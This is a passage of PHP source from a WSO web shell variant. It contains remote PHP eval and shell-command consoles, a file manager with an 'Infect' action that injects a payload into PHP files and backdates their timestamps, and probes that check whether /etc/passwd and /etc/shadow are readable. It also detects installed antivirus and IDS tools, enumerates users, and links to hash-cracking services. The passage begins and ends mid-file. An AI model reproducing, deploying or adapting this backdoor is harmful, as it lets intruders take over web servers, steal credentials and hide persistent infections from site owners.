   wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
   wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
   wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
   $temp = array();
   if (function_exists('mysql_get_client_info'))
      $temp[] = "MySql (" . mysql_get_client_info() . ")";
   if (function_exists('mssql_connect'))
      $temp[] = "MSSQL";
   if (function_exists('pg_connect'))
      $temp[] = "PostgreSQL";
   if (function_exists('oci_connect'))
      $temp[] = "Oracle";
   wsoSecParam('Supported databases', implode(', ', $temp));
   echo '<br>';

   if ($GLOBALS['os'] == 'nix') {
      wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
      wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
      wsoSecParam('OS version', @file_get_contents('/proc/version'));
      wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
      if (!$GLOBALS['safe_mode']) {
         $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
         $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
         $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
         echo '<br>';
         $temp = array();
         foreach ($userful as $item)
            if (wsoWhich($item))
               $temp[] = $item;
         wsoSecParam('Userful', implode(', ', $temp));
         $temp = array();
         foreach ($danger as $item)
            if (wsoWhich($item))
               $temp[] = $item;
         wsoSecParam('Danger', implode(', ', $temp));
         $temp = array();
         foreach ($downloaders as $item)
            if (wsoWhich($item))
               $temp[] = $item;
         wsoSecParam('Downloaders', implode(', ', $temp));
         echo '<br/>';
         wsoSecParam('HDD space', wsoEx('df -h'));
         wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
         echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
         if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
            $temp = "";
            for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
               $uid = @posix_getpwuid($_POST['p2']);
               if ($uid)
                  $temp .= join(':', $uid) . "\n";
            }
            echo '<br/>';
            wsoSecParam('Users', $temp);
         }
      }
   } else {
      wsoSecParam('OS Version', wsoEx('ver'));
      wsoSecParam('Account Settings', wsoEx('net accounts'));
      wsoSecParam('User Accounts', wsoEx('net user'));
   }
   echo '</div>';
   wsoFooter();
}

function actionPhp() {
   if (isset($_POST['ajax'])) {
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
      ob_start();
      eval($_POST['p1']);
      $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
      echo strlen($temp), "\n", $temp;
      exit;
   }
   if (empty($_POST['ajax']) && !empty($_POST['p1']))
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);

   wsoHeader();
   if (isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
      echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
      ob_start();
      phpinfo();
      $tmp = ob_get_clean();
      $tmp = preg_replace(array(
          '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
          '!td, th {(.*)}!msiU',
          '!<img[^>]+>!msiU',
              ), array(
          '',
          '.e, .v, .h, .h th {$1}',
          ''
              ), $tmp);
      echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
   }
   echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
   echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
   if (!empty($_POST['p1'])) {
      ob_start();
      eval($_POST['p1']);
      echo htmlspecialchars(ob_get_clean());
   }
   echo '</pre></div>';
   wsoFooter();
}

function actionFilesMan() {
   global $infeksi;
   global $cekinfeksi;
   if (!empty($_COOKIE['f']))
      $_COOKIE['f'] = @unserialize($_COOKIE['f']);

   if (!empty($_POST['p1'])) {
      switch ($_POST['p1']) {
         case 'infect':
            foreach ($_POST['f'] as $aa) {
               on3loveinfectntouch($aa);

               /** $time = strtotime(date('Y-m-d H:i:s', filectime($_POST['p1'])));   
                 $fk = @fopen($aa, "a+");
                 if(!preg_match('/php/', $aa)) unset($fk);
                 if ((!preg_match($cekinfeksi, @fread($fk, filesize($aa)))) && $fk) {
                 if (@fwrite($fk, $infeksi)) {
                 echo "<script>alert('Infected {$aa}')</script>";
                 fclose($fk);
                 if(touch($GLOBALS['cwd'].$aa, '2012-12-29 13:20:47', '2012-12-29 13:20:47')) echo "<script>alert('touched {$aa} {$time}')</script>";
                 }
                 } else {
                 echo "<script>alert('Fail to infect {$aa}')</script>";
                 }* */
            }
            break;
         case 'uploadFile':
            if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
               echo "Can't upload file!";
            break;
         case 'mkdir':
            if (!@mkdir($_POST['p2']))
               echo "Can't create new dir";
            break;
         case 'delete':

            function deleteDir($path) {
               $path = (substr($path, -1) == '/') ? $path : $path . '/';
               $dh = opendir($path);
               while (($item = readdir($dh) ) !== false) {
                  $item = $path . $item;
                  if ((basename($item) == "..") || (basename($item) == "."))
                     continue;
                  $type = filetype($item);
                  if ($type == "dir")
                     deleteDir($item);
                  else
                     @unlink($item);
               }
               closedir($dh);
               @rmdir($path);
            }

            if (is_array(@$_POST['f']))
               foreach ($_POST['f'] as $f) {
                  if ($f == '..')
                     continue;
                  $f = urldecode($f);
                  if (is_dir($f))
                     deleteDir($f);
                  else
                     @unlink($f);
               }
            break;
         case 'paste':
            if ($_COOKIE['act'] == 'copy') {

               function copy_paste($c, $s, $d) {
                  if (is_dir($c . $s)) {
                     mkdir($d . $s);
                     $h = @opendir($c . $s);
                     while (($f = @readdir($h)) !== false)
                        if (($f != ".") and ($f != ".."))
                           copy_paste($c . $s . '/', $f, $d . $s . '/');
                  } elseif (is_file($c . $s))
                     @copy($c . $s, $d . $s);
               }

               foreach ($_COOKIE['f'] as $f)
                  copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
            } elseif ($_COOKIE['act'] == 'move') {

               function move_paste($c, $s, $d) {
                  if (is_dir($c . $s)) {
                     mkdir($d . $s);
                     $h = @opendir($c . $s);
                     while (($f = @readdir($h)) !== false)
                        if (($f != ".") and ($f != ".."))
                           copy_paste($c . $s . '/', $f, $d . $s . '/');
                  } elseif (@is_file($c . $s))
                     @copy($c . $s, $d . $s);
               }

               foreach ($_COOKIE['f'] as $f)
                  @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
            } elseif ($_COOKIE['act'] == 'zip') {
               if (class_exists('ZipArchive')) {
                  $zip = new ZipArchive();
                  if ($zip->open($_POST['p2'], 1)) {
                     chdir($_COOKIE['c']);
                     foreach ($_COOKIE['f'] as $f) {
                        if ($f == '..')
                           continue;
                        if (@is_file($_COOKIE['c'] . $f))
                           $zip->addFile($_COOKIE['c'] . $f, $f);
                        elseif (@is_dir($_COOKIE['c'] . $f)) {
                           $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
                           foreach ($iterator as $key => $value) {
                              $zip->addFile(realpath($key), $key);
                           }
                        }
                     }
                     chdir($GLOBALS['cwd']);
                     $zip->close();
                  }
               }
            } elseif ($_COOKIE['act'] == 'unzip') {
               if (class_exists('ZipArchive')) {
                  $zip = new ZipArchive();
                  foreach ($_COOKIE['f'] as $f) {
                     if ($zip->open($_COOKIE['c'] . $f)) {
                        $zip->extractTo($GLOBALS['cwd']);
                        $zip->close();
                     }
                  }
               }
            } elseif ($_COOKIE['act'] == 'tar') {
               chdir($_COOKIE['c']);
               $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
               wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
               chdir($GLOBALS['cwd']);
            }
            unset($_COOKIE['f']);
            setcookie('f', '', time() - 3600);
            break;
         default:
            if (!empty($_POST['p1'])) {
               WSOsetcookie('act', $_POST['p1']);
               WSOsetcookie('f', serialize(@$_POST['f']));
               WSOsetcookie('c', @$_POST['c']);
            }
            break;
      }
   }
   wsoHeader();
   echo '<h1>File manager</h1><div name=surga><a href=# name=surga></a></div><div class=content><script>p1_=p2_=p3_="";</script>';

   $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
   if ($dirContent === false) {
      echo 'Can\'t open this folder!';
      wsoFooter();
      return;
   }
   global $sort;
   $sort = array('name', 1);
   if (!empty($_POST['p1'])) {
      if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
         $sort = array($match[1], (int) $match[2]);
   }
   echo "<script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
   $dirs = $files = array();
   $n = count($dirContent);
   for ($i = 0; $i < $n; $i++) {
      $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
      $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
      $tmp = array('name' => $dirContent[$i],
          'path' => $GLOBALS['cwd'] . $dirContent[$i],
          'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
          'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
          'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]),
          'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]),
          'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])
      );
      if (@is_file($GLOBALS['cwd'] . $dirContent[$i]))
         $files[] = array_merge($tmp, array('type' => 'file'));
      elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i]))
         $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
      elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != "."))
         $dirs[] = array_merge($tmp, array('type' => 'dir'));
   }
   $GLOBALS['sort'] = $sort;

   function wsoCmp($a, $b) {
      if ($GLOBALS['sort'][0] != 'size')
         return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
      else
         return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
   }

   usort($files, "wsoCmp");
   usort($dirs, "wsoCmp");
   $files = array_merge($dirs, $files);
   $l = 0;
   foreach ($files as $f) {
      echo '<tr' . ($l ? ' class=l1' : '') . '><td>
		<input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td>
		<a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td>
		<a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td>
		<a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> 
		<a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' 
		<a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> 
		<a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'infect\')"><font color="red">F</font></a> 
		<a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
      $l = $l ? 0 : 1;
   }
   echo "<tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
	<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<STYLE type='text/css'>
OPTION.on3love{; color:red}
</STYLE>
	<select name='p1'>
	<option value='copy'>Copy</option>
	<option value='move'>Move</option>
	<option value='delete'>Delete</option>
	<option value='infect' class='on3love'><font color='red'>Infect</font></option>
	";
   if (class_exists('ZipArchive'))
      echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
   echo "<option value='tar'>Compress (tar.gz)</option>";
   if (!empty($_COOKIE['act']) && @count($_COOKIE['f']))
      echo "<option value='paste'>Paste / Compress</option>";
   echo "</select>&nbsp;";
   if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
      echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'>&nbsp;";
   echo "<input type='submit' onHover='style:color:red;' value='>>'></td></tr></form></table></div>";
   wsoFooter();
}



function actionStringTools() {
   if (!function_exists('hex2bin')) {

      function hex2bin($p) {
         return decbin(hexdec($p));
      }

   }
   if (!function_exists('binhex')) {

      function binhex($p) {
         return dechex(bindec($p));
      }

   }
   if (!function_exists('hex2ascii')) {

      function hex2ascii($p) {
         $r = '';
         for ($i = 0; $i < strLen($p); $i+=2) {
            $r.=chr(hexdec($p[$i] . $p[$i + 1]));
         }return $r;
      }

   }
   if (!function_exists('ascii2hex')) {

      function ascii2hex($p) {
         $r = '';
         for ($i = 0; $i < strlen($p); ++$i)
            $r.= sprintf('%02X', ord($p[$i]));return strtoupper($r);
      }

   }
   if (!function_exists('full_urlencode')) {

      function full_urlencode($p) {
         $r = '';
         for ($i = 0; $i < strlen($p); ++$i)
            $r.= '%' . dechex(ord($p[$i]));return strtoupper($r);
      }

   }

   function shellcode_encode($p) {
      $r = '';
      for ($i = 0; $i < strlen($p); ++$i)
         $r.= '\x' . dechex(ord($p[$i]));return $r;
   }

   function shellcode_decode($p) {
      $rp = preg_replace('/x/', '%', stripslashes(urldecode($p)));
      return urldecode($rp);
   }

   $stringTools = array(
       'Base64 encode' => 'base64_encode',
       'Base64 decode' => 'base64_decode',
       'Url encode' => 'urlencode',
       'Url decode' => 'urldecode',
       'Full urlencode' => 'full_urlencode',
       'md5 hash' => 'md5',
       'sha1 hash' => 'sha1',
       'crypt' => 'crypt',
       'CRC32' => 'crc32',
       'ASCII to HEX' => 'ascii2hex',
       'HEX to ASCII' => 'hex2ascii',
       'HEX to DEC' => 'hexdec',
       'HEX to BIN' => 'hex2bin',
       'DEC to HEX' => 'dechex',
       'DEC to BIN' => 'decbin',
       'BIN to HEX' => 'binhex',
       'BIN to DEC' => 'bindec',
       'String to lower case' => 'strtolower',
       'String to upper case' => 'strtoupper',
       'Htmlspecialchars' => 'htmlspecialchars',
       'String length' => 'strlen',
       'ShellCode Encode' => 'shellcode_encode',
       'ShellCode Decode' => 'shellcode_decode'
   );
   if (isset($_POST['ajax'])) {
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
      ob_start();
      if (in_array($_POST['p1'], $stringTools))
         echo $_POST['p1']($_POST['p2']);
      $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
      echo strlen($temp), "\n", $temp;
      exit;
   }
   if (empty($_POST['ajax']) && !empty($_POST['p1']))
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
   wsoHeader();
   echo '<h1>String conversions</h1><div class=content>';
   echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
   foreach ($stringTools as $k => $v)
      echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
   echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
   if (!empty($_POST['p1'])) {
      if (in_array($_POST['p1'], $stringTools))
         echo htmlspecialchars($_POST['p1']($_POST['p2']));
      // if($_POST['p1'], $stringtools[])
   }
   echo"</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
			<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
			<tr><td></td><td><input type='submit' value='>>'></td></tr>
			</table></form>";

   function wsoRecursiveGlob($path) {
      if (substr($path, -1) != '/')
         $path.='/';
      $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
      if (is_array($paths) && @count($paths)) {
         foreach ($paths as $item) {
            if (@is_dir($item)) {
               if ($path != $item)
                  wsoRecursiveGlob($item);
            } else {
               if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false)
                  echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
            }
         }
      }
   }

   if (@$_POST['p3'])
      wsoRecursiveGlob($_POST['c']);
   echo "</div><br><h1>Search for hash:</h1><div class=content>
		<form method='post' target='_blank' name='hf'>
			<input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
			<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
		</form></div>";
   wsoFooter();
}

/**
  function OLinfectntouch($item, $date)
  {
  global $cekinfeksi, $infeksi;
  if (is_file($item) && is_readable($item))
  {
  foreach($GLOBALS['cwd'] as $dr){
  $oft = @fopen($dr.$file, "r");
  $isifile = implode("", $oft);
  @unlink($item);
  $filestrip = htmlentities($item);
  if(preg_match('/php/', $filestrip))
  if($bukafile = @fopen($filestrip, "w"))
  if ((!preg_match($cekinfeksi, @fread($bukafile, filesize($filestrip)))) && $bukafile  ) {
  if (@fwrite($fk, $infeksi)) {
  echo "<script>alert('Infected {$filestrip}')</script>";
  fclose($fk);
  }
  } else {
  echo "<script>alert('Fail to infect {$filestrip}')</script>";
  }
  }
  } elseif (is_dir($item) && is_readable($item)) {
  echo 'GAGAAAAAAAL!';
  }
  }
 **/
function actionFilesTools() {
   global $infeksi;
   global $cekinfeksi;
   if (isset($_POST['p1']))
      $_POST['p1'] = urldecode($_POST['p1']);
   if (@$_POST['p2'] == 'infect') { ///////////////////////////////ON#LOVE
      @on3loveinfectntouch($_POST['p1']);
      /**
        if (is_file($_POST['p1']) && is_readable($_POST['p1'])) {
        $aa = htmlentities($_POST['p1']);
        if(preg_match('/php/', $aa)) $fk = @fopen($aa, "a+") or die('must be *.php');
        if ((!preg_match($cekinfeksi, @fread($fk, filesize($aa)))) && $fk  ) {
        $rekam = filectime($aa);
        if (@fwrite($fk, $infeksi)) {
        @touch(urldecode($aa), $rekam, $rekam);
        echo "<script>alert('Infected {$aa}')</script>";
        fclose($fk);
        }
        } else {
        echo "<script>alert('Fail to infect {$aa}')</script>";
        }
        } elseif (is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
        echo 'GAGAAAAAAAL!';
        }* */
      exit;
   } //on3loveend
   if (@$_POST['p2'] == 'download') {
      if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
         ob_start("ob_gzhandler", 4096);
         header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
         if (function_exists("mime_content_type")) {
            $type = @mime_content_type($_POST['p1']);
            header("Content-Type: " . $type);
         } else
            header("Content-Type: application/octet-stream");
         $fp = @fopen($_POST['p1'], "r");
         if ($fp) {
            while (!@feof($fp))
               echo @fread($fp, 1024);
            fclose($fp);
         }
      }exit;
   }
   if (@$_POST['p2'] == 'mkfile') {
      if (!file_exists($_POST['p1'])) {
         $fp = @fopen($_POST['p1'], 'w');
         if ($fp) {
            $_POST['p2'] = "edit";
            fclose($fp);
         }
      }
   }
   wsoHeader();
   echo '<h1>File tools</h1><div class=content>';
   if (!file_exists(@$_POST['p1'])) {
      echo 'File not exists';
      wsoFooter();
      return;
   }
   $uid = @posix_getpwuid(@fileowner($_POST['p1']));
   if (!$uid) {
      $uid['name'] = @fileowner($_POST['p1']);
      $gid['name'] = @filegroup($_POST['p1']);
   } else
      $gid = @posix_getgrgid(@filegroup($_POST['p1']));
   echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
   echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
   if (empty($_POST['p2']))
      $_POST['p2'] = 'view';
   if (is_file($_POST['p1']))
      $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Infect');
   else
      $m = array('Chmod', 'Rename', 'Touch');
   foreach ($m as $v)
      echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
   echo '<br><br>';
   switch ($_POST['p2']) {
      case 'view':
         echo '<pre class=ml1>';
         $fp = @fopen($_POST['p1'], 'r');
         if ($fp) {
            while (!@feof($fp))
               echo htmlspecialchars(@fread($fp, 1024));
            @fclose($fp);
         }
         echo '</pre>';
         break;
      case 'highlight':
         if (@is_readable($_POST['p1'])) {
            echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
            $code = @highlight_file($_POST['p1'], true);
            echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
         }
         break;
      case 'chmod':
         if (!empty($_POST['p3'])) {
            $perms = 0;
            for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i)
               $perms += (int) $_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
            if (!@chmod($_POST['p1'], $perms))
               echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
         }
         clearstatcache();
         echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
         break;
      case 'edit':
         if (!is_writable($_POST['p1'])) {
            echo 'File isn\'t writeable';
            break;
         }
         if (!empty($_POST['p3'])) {
            $time = @filemtime($_POST['p1']);
            $_POST['p3'] = substr($_POST['p3'], 1);
            $fp = @fopen($_POST['p1'], "w");
            if ($fp) {
               @fwrite($fp, $_POST['p3']);
               @fclose($fp);
               echo 'Saved!!<br><script>p3_="";</script>';
               @touch($_POST['p1'], $time, $time);
            }
         }
         echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
         $fp = @fopen($_POST['p1'], 'r');
         if ($fp) {
            while (!@feof($fp))
               echo htmlspecialchars(@fread($fp, 1024));
            @fclose($fp);
         }
         echo '</textarea><input type=submit value=">>"></form>';
         break;
      case 'hexdump':
         $c = @file_get_contents($_POST['p1']);
         $n = 0;
         $h = array('00000000<br>', '', '');
         $len = strlen($c);
         for ($i = 0; $i < $len; ++$i) {
            $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
            switch (ord($c[$i])) {
               case 0: $h[2] .= ' ';
                  break;
               case 9: $h[2] .= ' ';
                  break;
               case 10: $h[2] .= ' ';
                  break;
               case 13: $h[2] .= ' ';
                  break;
               default: $h[2] .= $c[$i];
                  break;
            }
            $n++;
            if ($n == 32) {
               $n = 0;
               if ($i + 1 < $len) {
                  $h[0] .= sprintf('%08X', $i + 1) . '<br>';
               }
               $h[1] .= '<br>';
               $h[2] .= "\n";
            }
         }
         echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
         break;
      case 'rename':
         if (!empty($_POST['p3'])) {
            if (!@rename($_POST['p1'], $_POST['p3']))
               echo 'Can\'t rename!<br>';
            else
               die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
         }
         echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
         break;
      case 'touch':
         if (!empty($_POST['p3'])) {
            $time = strtotime($_POST['p3']);
            if ($time) {
               if (!touch($_POST['p1'], $time, $time))
                  echo 'Fail!';
               else
                  echo 'Touched!';
            } else
               echo 'Bad time format!';
         }
         clearstatcache();
         echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
         break;
      case 'infect':
      	if(@on3loveInfectnTouch($_POST['p1'])){echo 'SUCCESS!';}
      	 clearstatcache();
      	 break;
   }
   echo '</div>';
   wsoFooter();
}

function actionConsole() {
   if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
      $_POST['p1'] .= ' 2>&1';
   } elseif (!empty($_POST['p1']))
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);

   if (isset($_POST['ajax'])) {
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
      ob_start();
      echo "d.cf.cmd.value='';\n";
      $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']), "\n\r\t\\'\0"));
      if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
         if (@chdir($match[1])) {
            $GLOBALS['cwd'] = @getcwd();
            echo "c_='" . $GLOBALS['cwd'] . "';";
         }
      }
      echo "d.cf.output.value+='" . $temp . "';";
      echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
